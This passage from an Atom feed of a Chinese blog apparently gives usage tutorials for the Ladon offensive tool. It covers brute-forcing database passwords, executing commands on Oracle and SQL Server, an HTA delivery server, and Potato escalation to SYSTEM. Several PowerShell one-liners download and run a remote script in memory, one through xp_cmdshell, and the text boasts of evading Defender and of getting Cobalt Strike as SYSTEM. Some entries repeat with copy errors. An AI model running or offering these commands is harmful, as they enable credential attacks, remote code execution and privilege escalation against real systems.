title="mssql密码验证"></a>mssql密码验证</h5><p>(大型内网可能从其它机器收集到大量机器密码,第一步肯定是先验证)<br>非默认端口请将以下端口改成被修改端口即可,单个IP可直接Ladon IP:端口 MssqlScan扫描<br>check.txt<br>192.168.1.8 1433 master sa k8gege<br>192.168.1.8 sa k8gege<br>192.168.1.8 1433 sa k8gege<br>命令: Ladon MssqlScan</p><h5 id="oracle同理"><a href="#oracle同理" class="headerlink" title="oracle同理"></a>oracle同理</h5><p>192.168.1.8 1521 orcl system k8gege<br>192.168.1.8 orcl system k8gege<br>192.168.1.8 system k8gege<br>命令: Ladon OracleScan</p><h5 id="mysql无需指定数据库名"><a href="#mysql无需指定数据库名" class="headerlink" title="mysql无需指定数据库名"></a>mysql无需指定数据库名</h5><p>192.168.1.8 3306 root k8gege<br>192.168.1.8 root k8gege<br>命令: Ladon MysqlScan</p><h3 id="PowerLadon"><a href="#PowerLadon" class="headerlink" title="PowerLadon"></a>PowerLadon</h3><h4 id="远程加载OracleScan-1521端口弱口令爆破"><a href="#远程加载OracleScan-1521端口弱口令爆破" class="headerlink" title="远程加载OracleScan 1521端口弱口令爆破"></a>远程加载OracleScan 1521端口弱口令爆破</h4><p>powershell “IEX (New-Object Net.WebClient).DownloadString(‘<a href="http://192.168.1.3:800/Ladon.ps1'" target="_blank" rel="noopener">http://192.168.1.3:800/Ladon.ps1'</a>); Ladon 192.168.1.141 OracleScan”</p><h3 id="Kali、Linux、Mac、路由器等操作系统"><a href="#Kali、Linux、Mac、路由器等操作系统" class="headerlink" title="Kali、Linux、Mac、路由器等操作系统"></a>Kali、Linux、Mac、路由器等操作系统</h3><p>./Ladon 192.168.1.8/24 OracleScan<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/OracleScan_up.png"></p><h3 id="Oracle数据库远程提权工具"><a href="#Oracle数据库远程提权工具" class="headerlink" title="Oracle数据库远程提权工具"></a>Oracle数据库远程提权工具</h3><p>12.15<br>[+]OracleCmd2 Oracle数据库远程提权工具2 官方驱动>=net 4.8 大小4.9M不内置</p><p>Ladon 12.2 12.14<br>[+]OracleCmd Oracle数据库远程提权工具 3种方法一键提权<br> 支持Windows/Linux/MacOS等服务器操作系统<br> 支持高版本Oracle 12G、11G、12G及之前版本</p><p>GUI版 填写用户密码 Oracle一键提权远程执行命令<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/OracleStudy.png"></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon OracleCmd 192.168.50.18 1521 orcl admin K8gege520 m3 whoami</span><br><span class="line">Ladon OracleCmd 192.168.50.18 1521 orcl admin K8gege520 m2 whoami</span><br><span class="line">Ladon OracleCmd 192.168.50.18 1521 orcl admin K8gege520 m1 whoami</span><br><span class="line"></span><br><span class="line">Ladon OracleCmd2 192.168.50.18 1521 orcl admin K8gege520 whoami</span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/OracleCmd.png"></p><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/OracleCmd2.png"></p><h3 id="工具下载"><a href="#工具下载" class="headerlink" title="工具下载"></a>工具下载</h3><p>最新版本:<a href="https://k8gege.org/Download">https://k8gege.org/Download</a><br>历史版本: <a href="https://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener">https://github.com/k8gege/Ladon/releases</a></p><div style="text-align: center; width: 710px; border: green solid 0px;"><img alt style="display: inline-block;width: 250px;height: 300px;" data-original="http://k8gege.org/img/k8team.jpg"></div>]]></content>
<summary type="html">
<p style="color:#fff;">
<% <span class="archive-article-date">
Visit <span id="busuanzi_value_page_pv"></span>
%>
</%></p>
<p>===========
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="Ladon" scheme="http://k8gege.org/tags/Ladon/"/>
</entry>
<entry>
<title>Ladon渗透Mysql数据库一键提权 密码爆破</title>
<link href="http://k8gege.org/p/MysqlScan.html"/>
<id>http://k8gege.org/p/MysqlScan.html</id>
<published>2023-12-14T06:20:00.000Z</published>
<updated>2024-11-14T15:02:49.123Z</updated>
<content type="html"><![CDATA[<p style="color:#fff;"> <% <span class="archive-article-date">Visit <span id="busuanzi_value_page_pv"></span>%></%></p><p>=============================================================================================<br>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</p><script language="javascript" type="text/javascript">window.location.href="http://k8gege.org/Ladon/MysqlScan.html";</script><h3 id="3306端口-Mysql数据库密码爆破"><a href="#3306端口-Mysql数据库密码爆破" class="headerlink" title="3306端口 Mysql数据库密码爆破"></a>3306端口 Mysql数据库密码爆破</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8/24 MysqlScan</span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/MysqlScan_up.png"></p><h4 id="配置密码爆破参数"><a href="#配置密码爆破参数" class="headerlink" title="配置密码爆破参数"></a>配置密码爆破参数</h4><p>1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此<br>2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密<br>3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认</p><p>user.txt和pass.txt分别存放用户、密码<br>userpass.txt存放用户密码组,即每行存放用户以及密码<br>check.txt每行存放IP\端口\用户\密码</p><h4 id="数据库口令检测"><a href="#数据库口令检测" class="headerlink" title="数据库口令检测"></a>数据库口令检测</h4><h5 id="mssql密码验证"><a href="#mssql密码验证" class="headerlink" title="mssql密码验证"></a>mssql密码验证</h5><p>(大型内网可能从其它机器收集到大量机器密码,第一步肯定是先验证)<br>非默认端口请将以下端口改成被修改端口即可,单个IP可直接Ladon IP:端口 MssqlScan扫描<br>check.txt<br>192.168.1.8 1433 master sa k8gege<br>192.168.1.8 sa k8gege<br>192.168.1.8 1433 sa k8gege<br>命令: Ladon MssqlScan</p><h5 id="Oracle同理"><a href="#Oracle同理" class="headerlink" title="Oracle同理"></a>Oracle同理</h5><p>192.168.1.8 1521 orcl system k8gege<br>192.168.1.8 orcl system k8gege<br>192.168.1.8 system k8gege<br>命令: Ladon OrcleScan</p><h5 id="Mysql无需指定数据库名"><a href="#Mysql无需指定数据库名" class="headerlink" title="Mysql无需指定数据库名"></a>Mysql无需指定数据库名</h5><p>192.168.1.8 3306 root k8gege<br>192.168.1.8 root k8gege<br>命令: Ladon MssqlScan</p><h3 id="PowerLadon"><a href="#PowerLadon" class="headerlink" title="PowerLadon"></a>PowerLadon</h3><h4 id="远程加载MysqlScan-1521端口弱口令爆破"><a href="#远程加载MysqlScan-1521端口弱口令爆破" class="headerlink" title="远程加载MysqlScan 1521端口弱口令爆破"></a>远程加载MysqlScan 1521端口弱口令爆破</h4><p>powershell “IEX (New-Object Net.WebClient).DownloadString(‘<a href="http://192.168.1.3:800/Ladon.ps1'" target="_blank" rel="noopener">http://192.168.1.3:800/Ladon.ps1'</a>); Ladon 192.168.1.141 MysqlScan”</p><h3 id="Kali、Linux、Mac、路由器等操作系统"><a href="#Kali、Linux、Mac、路由器等操作系统" class="headerlink" title="Kali、Linux、Mac、路由器等操作系统"></a>Kali、Linux、Mac、路由器等操作系统</h3><p>./Ladon 192.168.1.8/24 MysqlScan<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/MysqlScan_up.png"></p><h3 id="Mysql数据库远程提权工具"><a href="#Mysql数据库远程提权工具" class="headerlink" title="Mysql数据库远程提权工具"></a>Mysql数据库远程提权工具</h3><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/MysqlStudy.png"></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/MysqlCmd.png"></p><h3 id="工具下载"><a href="#工具下载" class="headerlink" title="工具下载"></a>工具下载</h3><p>最新版本:<a href="https://k8gege.org/Download">https://k8gege.org/Download</a><br>历史版本: <a href="https://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener">https://github.com/k8gege/Ladon/releases</a></p><div style="text-align: center; width: 710px; border: green solid 0px;"><img alt style="display: inline-block;width: 250px;height: 300px;" data-original="http://k8gege.org/img/k8team.jpg"></div>]]></content>
<summary type="html">
<p style="color:#fff;">
<% <span class="archive-article-date">
Visit <span id="busuanzi_value_page_pv"></span>
%>
</%></p>
<p>===========
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="Ladon" scheme="http://k8gege.org/tags/Ladon/"/>
</entry>
<entry>
<title>Ladon渗透SQL Server数据库一键提权 密码爆破</title>
<link href="http://k8gege.org/p/MysqlScan.html"/>
<id>http://k8gege.org/p/MysqlScan.html</id>
<published>2023-12-14T06:20:00.000Z</published>
<updated>2024-11-14T15:02:49.108Z</updated>
<content type="html"><![CDATA[<p style="color:#fff;"> <% <span class="archive-article-date">Visit <span id="busuanzi_value_page_pv"></span>%></%></p><p>=============================================================================================<br>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</p><script language="javascript" type="text/javascript">window.location.href="http://k8gege.org/Ladon/MssqlScan.html";</script><h3 id="1433端口-Mssql数据库密码爆破"><a href="#1433端口-Mssql数据库密码爆破" class="headerlink" title="1433端口 Mssql数据库密码爆破"></a>1433端口 Mssql数据库密码爆破</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8/24 MssqlScan</span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/MysqlScan_up.png"></p><h4 id="配置密码爆破参数"><a href="#配置密码爆破参数" class="headerlink" title="配置密码爆破参数"></a>配置密码爆破参数</h4><p>1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此<br>2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密<br>3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认</p><p>user.txt和pass.txt分别存放用户、密码<br>userpass.txt存放用户密码组,即每行存放用户以及密码<br>check.txt每行存放IP\端口\用户\密码</p><h4 id="数据库口令检测"><a href="#数据库口令检测" class="headerlink" title="数据库口令检测"></a>数据库口令检测</h4><h5 id="mssql密码验证"><a href="#mssql密码验证" class="headerlink" title="mssql密码验证"></a>mssql密码验证</h5><p>(大型内网可能从其它机器收集到大量机器密码,第一步肯定是先验证)<br>非默认端口请将以下端口改成被修改端口即可,单个IP可直接Ladon IP:端口 MssqlScan扫描<br>check.txt<br>192.168.1.8 1433 master sa k8gege<br>192.168.1.8 sa k8gege<br>192.168.1.8 1433 sa k8gege<br>命令: Ladon MssqlScan</p><h5 id="Oracle同理"><a href="#Oracle同理" class="headerlink" title="Oracle同理"></a>Oracle同理</h5><p>192.168.1.8 1521 orcl system k8gege<br>192.168.1.8 orcl system k8gege<br>192.168.1.8 system k8gege<br>命令: Ladon OrcleScan</p><h5 id="Mysql无需指定数据库名"><a href="#Mysql无需指定数据库名" class="headerlink" title="Mysql无需指定数据库名"></a>Mysql无需指定数据库名</h5><p>192.168.1.8 3306 root k8gege<br>192.168.1.8 root k8gege<br>命令: Ladon MssqlScan</p><h3 id="PowerLadon"><a href="#PowerLadon" class="headerlink" title="PowerLadon"></a>PowerLadon</h3><h4 id="远程加载MysqlScan-1521端口弱口令爆破"><a href="#远程加载MysqlScan-1521端口弱口令爆破" class="headerlink" title="远程加载MysqlScan 1521端口弱口令爆破"></a>远程加载MysqlScan 1521端口弱口令爆破</h4><p>powershell “IEX (New-Object Net.WebClient).DownloadString(‘<a href="http://192.168.1.3:800/Ladon.ps1'" target="_blank" rel="noopener">http://192.168.1.3:800/Ladon.ps1'</a>); Ladon 192.168.1.141 MysqlScan”</p><h3 id="Kali、Linux、Mac、路由器等操作系统"><a href="#Kali、Linux、Mac、路由器等操作系统" class="headerlink" title="Kali、Linux、Mac、路由器等操作系统"></a>Kali、Linux、Mac、路由器等操作系统</h3><p>./Ladon 192.168.1.8/24 MysqlScan<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/MysqlScan_up.png"></p><h3 id="Mysql数据库远程提权工具"><a href="#Mysql数据库远程提权工具" class="headerlink" title="Mysql数据库远程提权工具"></a>Mysql数据库远程提权工具</h3><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/MysqlStudy.png"></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/MysqlCmd.png"></p><h3 id="工具下载"><a href="#工具下载" class="headerlink" title="工具下载"></a>工具下载</h3><p>最新版本:<a href="https://k8gege.org/Download">https://k8gege.org/Download</a><br>历史版本: <a href="https://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener">https://github.com/k8gege/Ladon/releases</a></p><div style="text-align: center; width: 710px; border: green solid 0px;"><img alt style="display: inline-block;width: 250px;height: 300px;" data-original="http://k8gege.org/img/k8team.jpg"></div>]]></content>
<summary type="html">
<p style="color:#fff;">
<% <span class="archive-article-date">
Visit <span id="busuanzi_value_page_pv"></span>
%>
</%></p>
<p>===========
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="Ladon" scheme="http://k8gege.org/tags/Ladon/"/>
</entry>
<entry>
<title>Ladon渗透 HTA服务器 访问DOC执行HTA</title>
<link href="http://k8gege.org/p/HtaSer.html"/>
<id>http://k8gege.org/p/HtaSer.html</id>
<published>2023-12-05T14:34:00.000Z</published>
<updated>2024-11-14T15:02:48.390Z</updated>
<content type="html"><![CDATA[<p>Ladon for Kali/Ubuntu/Mac/Centos/Router/MIPS/ARM</p><h3 id="HTA服务器-一键启动-访问DOC也能执行HTA"><a href="#HTA服务器-一键启动-访问DOC也能执行HTA" class="headerlink" title="HTA服务器 一键启动 访问DOC也能执行HTA"></a>HTA服务器 一键启动 访问DOC也能执行HTA</h3><p>Ladon和LadonGO用法一致 不限制后缀 访问doc也能执行hta</p><h5 id="Ladon命令"><a href="#Ladon命令" class="headerlink" title="Ladon命令"></a>Ladon命令</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon HtaSer</span><br><span class="line">Ladon HtaSer 8080</span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/HtaSer.PNG"></p><h5 id="Kali启动"><a href="#Kali启动" class="headerlink" title="Kali启动"></a>Kali启动</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./Ladon HtaSer</span><br><span class="line">./Ladon HtaSer 8080</span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/LadonGo/HtaSer.PNG"></p><h5 id="HtaSer-exe"><a href="#HtaSer-exe" class="headerlink" title="HtaSer.exe"></a>HtaSer.exe</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">HtaSer</span><br><span class="line">HtaSer 8080</span><br></pre></td></tr></table></figure><h3 id="Download"><a href="#Download" class="headerlink" title="Download"></a>Download</h3><p>PowerLadon: <a href="https://github.com/k8gege/PowerLadon" target="_blank" rel="noopener">https://github.com/k8gege/PowerLadon</a><br>History: <a href="http://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener">http://github.com/k8gege/Ladon/releases</a><br>9.1.1:<a href="http://k8gege.org/Download">http://k8gege.org/Download</a><br>12.0:K8小密圈</p><div style="text-align: center; width: 710px; border: green solid 0px;"><img alt style="display: inline-block;width: 250px;height: 300px;" data-original="http://k8gege.org/img/k8team.jpg"></div>]]></content>
<summary type="html">
<p>Ladon for Kali/Ubuntu/Mac/Centos/Router/MIPS/ARM</p>
<h3 id="HTA服务器-一键启动-访问DOC也能执行HTA"><a href="#HTA服务器-一键启动-访问DOC也能执行HTA" class="headerl
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="0day" scheme="http://k8gege.org/tags/0day/"/>
<category term="hta" scheme="http://k8gege.org/tags/hta/"/>
</entry>
<entry>
<title>〖教程〗Ladon渗透5个Potato提权</title>
<link href="http://k8gege.org/p/potato.html"/>
<id>http://k8gege.org/p/potato.html</id>
<published>2023-11-19T16:08:00.000Z</published>
<updated>2024-11-14T15:02:49.420Z</updated>
<content type="html"><![CDATA[<h1 id="Ladon提权之PipePotato-BadPotato-EfsPotato-GodPotato-McpPotato-SweetPotato-PrintSpoofer"><a href="#Ladon提权之PipePotato-BadPotato-EfsPotato-GodPotato-McpPotato-SweetPotato-PrintSpoofer" class="headerlink" title="Ladon提权之PipePotato/BadPotato/EfsPotato/GodPotato/McpPotato/SweetPotato/PrintSpoofer"></a>Ladon提权之PipePotato/BadPotato/EfsPotato/GodPotato/McpPotato/SweetPotato/PrintSpoofer</h1><p>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</p><script language="javascript" type="text/javascript">window.location.href="http://k8gege.org/Ladon/potato.html";</script><p>Ladon提权之PipePotato/BadPotato/SweetPotato/PrintSpoofer</p><h3 id="版本"><a href="#版本" class="headerlink" title="版本"></a>版本</h3><p>>= Ladon 7.2.0<br>Update: 20200810</p><h3 id="Potato提权原理"><a href="#Potato提权原理" class="headerlink" title="Potato提权原理"></a>Potato提权原理</h3><p>通过各种方法在本地NTLM中继获取SYSTEM令牌,再通过模拟令牌执行命令,通过以上方法提权统称为potato(不管是否基于原potato修改)。就像SQL注入,通过特定SQL语句注入获取特定数据库信息统称为SQL注入,而不管如何编写的SQL语句,是否基于别人的SQL语句修改。</p><h3 id="提权条件"><a href="#提权条件" class="headerlink" title="提权条件"></a>提权条件</h3><p>1 本地NTLM中继获取SYSTEM令牌<br>2 SeImpersonatePrivilege特权</p><p>测试中任意用户都可以通过本地NTLM中继获取到SYSTEM令牌权限,但是由于USER默认不开户SeImpersonatePrivilege特权,无法模拟令牌创建进程无法执行命令,所以会导致很多Potato提权失败。如下方”Win7管理员提权至SYSTEM“图片上部分就是USER部分的Potato提权失败,下方是管理员权限,而其它环境都是IIS权限。所以为了方便Ladon默认也显示当前用户SeImpersonatePrivilege特权情况。</p><h3 id="SweetPotato"><a href="#SweetPotato" class="headerlink" title="SweetPotato"></a>SweetPotato</h3><p>SweetPotato集成了原版Potato和JulyPotato的功能,包含DCOM/WINRM/PrintSpoofer方法获取SYSTEM。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Load SweetPotato</span><br><span class="line">Local Privilege Escalation from Windows Service Accounts to SYSTEM</span><br><span class="line">Vulnerable: Win7-Win10/Win2008-2019</span><br><span class="line">Usage:</span><br><span class="line">Ladon SweetPotato cmdline</span><br></pre></td></tr></table></figure><h3 id="PrintSpoofer"><a href="#PrintSpoofer" class="headerlink" title="PrintSpoofer"></a>PrintSpoofer</h3><p>pipePotato:一种新型的通用提权漏洞,PrintSpoofer是一个利用打印机PIPE提权的方法,国人写了个工具叫BadPotato。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Load BadPotato</span><br><span class="line">Local Privilege Escalation from Windows Service Accounts to SYSTEM</span><br><span class="line">PrintSpoofer Abusing Impersonate Privileges.</span><br><span class="line">Vulnerable: Win8-Win10/Win2012-2019</span><br><span class="line">Usage:</span><br><span class="line">Ladon BadPotato cmdline</span><br></pre></td></tr></table></figure><h3 id="测试环境"><a href="#测试环境" class="headerlink" title="测试环境"></a>测试环境</h3><p>1 Win7 IIS 应用池用户权限<br>2 Win7 本地管理员用户权限<br>3 Win2012 IIS 应用池权限<br>4 Win7 本地服务用户权限<br>5 Win8 本地服务用户权限</p><p>PS:由于BadPotato不支持WIN7系统,所以以上环境主要以测试SweetPotato为主。</p><h4 id="Win7管理员提权至SYSTEM"><a href="#Win7管理员提权至SYSTEM" class="headerlink" title="Win7管理员提权至SYSTEM"></a>Win7管理员提权至SYSTEM</h4><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/lpe/Win7_Admin_SweetPotato.PNG"></p><h4 id="Win7-IIS应用池提权至SYSTEM"><a href="#Win7-IIS应用池提权至SYSTEM" class="headerlink" title="Win7 IIS应用池提权至SYSTEM"></a>Win7 IIS应用池提权至SYSTEM</h4><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/lpe/IIS_Win7_SweetPotato.PNG"></p><h4 id="2012-R2-IIS应用池提权至SYSTEM"><a href="#2012-R2-IIS应用池提权至SYSTEM" class="headerlink" title="2012 R2 IIS应用池提权至SYSTEM"></a>2012 R2 IIS应用池提权至SYSTEM</h4><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/lpe/IIS8_2012_PR.PNG"></p><h4 id="WIN7服务用户CS提权至SYSTEM"><a href="#WIN7服务用户CS提权至SYSTEM" class="headerlink" title="WIN7服务用户CS提权至SYSTEM"></a>WIN7服务用户CS提权至SYSTEM</h4><p>本地服务用户权限下直接以SYSTEM权限上控Cobalt Strike<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/lpe/CS_PR_SweetPotato.png"></p><h4 id="WIN8服务用户提权至SYSTEM"><a href="#WIN8服务用户提权至SYSTEM" class="headerlink" title="WIN8服务用户提权至SYSTEM"></a>WIN8服务用户提权至SYSTEM</h4><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/lpe/BadPotato.png"></p><h3 id="IIS提权"><a href="#IIS提权" class="headerlink" title="IIS提权"></a>IIS提权</h3><p><a href="http://k8gege.org/p/6b9b3afe.html">http://k8gege.org/p/6b9b3afe.html</a></p><h3 id="Ladon五个Potato提权命令"><a href="#Ladon五个Potato提权命令" class="headerlink" title="Ladon五个Potato提权命令"></a>Ladon五个Potato提权命令</h3><p>Ladon >= 12.2</p><h5 id="117-BadPotato服务用户提权至SYSTEM"><a href="#117-BadPotato服务用户提权至SYSTEM" class="headerlink" title="117 BadPotato服务用户提权至SYSTEM"></a>117 BadPotato服务用户提权至SYSTEM</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon BadPotato cmdline</span><br></pre></td></tr></table></figure><h5 id="118-SweetPotato服务用户提权至SYSTEM"><a href="#118-SweetPotato服务用户提权至SYSTEM" class="headerlink" title="118 SweetPotato服务用户提权至SYSTEM"></a>118 SweetPotato服务用户提权至SYSTEM</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon SweetPotato cmdline</span><br></pre></td></tr></table></figure><h5 id="119-EfsPotato-Win7-2019提权-服务用户权限提到system"><a href="#119-EfsPotato-Win7-2019提权-服务用户权限提到system" class="headerlink" title="119 EfsPotato Win7-2019提权(服务用户权限提到system)"></a>119 EfsPotato Win7-2019提权(服务用户权限提到system)</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon EfsPotato whoami</span><br></pre></td></tr></table></figure><h5 id="235-Win11-2022系统提权至system权限"><a href="#235-Win11-2022系统提权至system权限" class="headerlink" title="235 Win11/2022系统提权至system权限"></a>235 Win11/2022系统提权至system权限</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon McpPotato whoami</span><br></pre></td></tr></table></figure><h5 id="221-GodPotato提权Win8-Win11-Win2012-Win2022"><a href="#221-GodPotato提权Win8-Win11-Win2012-Win2022" class="headerlink" title="221 GodPotato提权Win8-Win11 Win2012-Win2022"></a>221 GodPotato提权Win8-Win11 Win2012-Win2022</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon GodPotato whoami</span><br></pre></td></tr></table></figure><h5 id="190-MssqlCmd-SQL-Server数据库远程efspotato、badpotato提权"><a href="#190-MssqlCmd-SQL-Server数据库远程efspotato、badpotato提权" class="headerlink" title="190 MssqlCmd SQL Server数据库远程efspotato、badpotato提权"></a>190 MssqlCmd SQL Server数据库远程efspotato、badpotato提权</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr</span><br><span class="line">Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr</span><br><span class="line">Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami</span><br><span class="line">Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami</span><br><span class="line">Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami</span><br></pre></td></tr></table></figure><h5 id="本地PowerShell-Ladon-Potato提权"><a href="#本地PowerShell-Ladon-Potato提权" class="headerlink" title="本地PowerShell Ladon Potato提权"></a>本地PowerShell Ladon Potato提权</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">powershell Import-Module .\Ladon.ps1;Ladon GodPotato whoami</span><br><span class="line">powershell Import-Module .\Ladon.ps1;Ladon McpPotato whoami</span><br><span class="line">powershell Import-Module .\Ladon.ps1;Ladon EfsPotato whoami</span><br><span class="line">powershell Import-Module .\Ladon.ps1;Ladon SweetPotato whoami</span><br><span class="line">powershell Import-Module .\Ladon.ps1;Ladon BadPotato whoami</span><br></pre></td></tr></table></figure><h5 id="远程PowerShell-Ladon-Potato提权"><a href="#远程PowerShell-Ladon-Potato提权" class="headerlink" title="远程PowerShell Ladon Potato提权"></a>远程PowerShell Ladon Potato提权</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">powershell <span class="string">"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5:800/Ladon.ps1');Ladon GodPotato whoami</span></span><br><span class="line"><span class="string">powershell "</span>IEX (New-Object Net.WebClient).DownloadString(<span class="string">'http://192.168.1.5:800/Ladon.ps1'</span>);Ladon McpPotato whoami</span><br><span class="line">powershell <span class="string">"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5:800/Ladon.ps1');Ladon EfsPotato whoami</span></span><br><span class="line"><span class="string">powershell "</span>IEX (New-Object Net.WebClient).DownloadString(<span class="string">'http://192.168.1.5:800/Ladon.ps1'</span>);Ladon SweetPotato whoami</span><br><span class="line">powershell <span class="string">"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5:800/Ladon.ps1');Ladon BadPotato whoami</span></span><br></pre></td></tr></table></figure><h2 id="SQL-Server数据库PowerShell-Ladon远程内存提权"><a href="#SQL-Server数据库PowerShell-Ladon远程内存提权" class="headerlink" title="SQL Server数据库PowerShell Ladon远程内存提权"></a>SQL Server数据库PowerShell Ladon远程内存提权</h2><p><a href="http://k8gege.org/Ladon/win2016_lpe_potato_bypass.html">http://k8gege.org/Ladon/win2016_lpe_potato_bypass.html</a></p><h3 id="测试环境-1"><a href="#测试环境-1" class="headerlink" title="测试环境"></a>测试环境</h3><p>Windows Server 2016<br>SQL: 13.0.1601.5<br>Microsoft Windows [Version 10.0.14393]</p><h3 id="Ladon本地用户权限提权"><a href="#Ladon本地用户权限提权" class="headerlink" title="Ladon本地用户权限提权"></a>Ladon本地用户权限提权</h3><p>网上找了些LPE,发现直接被Defender杀,病毒库更新至2021.1.19,Ladon没被杀,管理员UAC权限可通过BypassUac提权<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/lpe/win2016_user_lpe.png"></p><h3 id="MSSQL远程加载Ladon提权"><a href="#MSSQL远程加载Ladon提权" class="headerlink" title="MSSQL远程加载Ladon提权"></a>MSSQL远程加载Ladon提权</h3><p>执行SQL查询权限为network service</p><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/lpe/sql2016_whoami.PNG"></p><h4 id="远程内存加载PowerLadon提权"><a href="#远程内存加载PowerLadon提权" class="headerlink" title="远程内存加载PowerLadon提权"></a>远程内存加载PowerLadon提权</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exec</span> master..xp_cmdshell <span class="string">'powershell "IEX (New-Object Net.WebClient).DownloadString('</span><span class="string">'http://xxxxxx.800/Ladon.ps1'</span><span class="string">'); Ladon SweetPotato "whoami""'</span></span><br></pre></td></tr></table></figure><p><img alt="image" 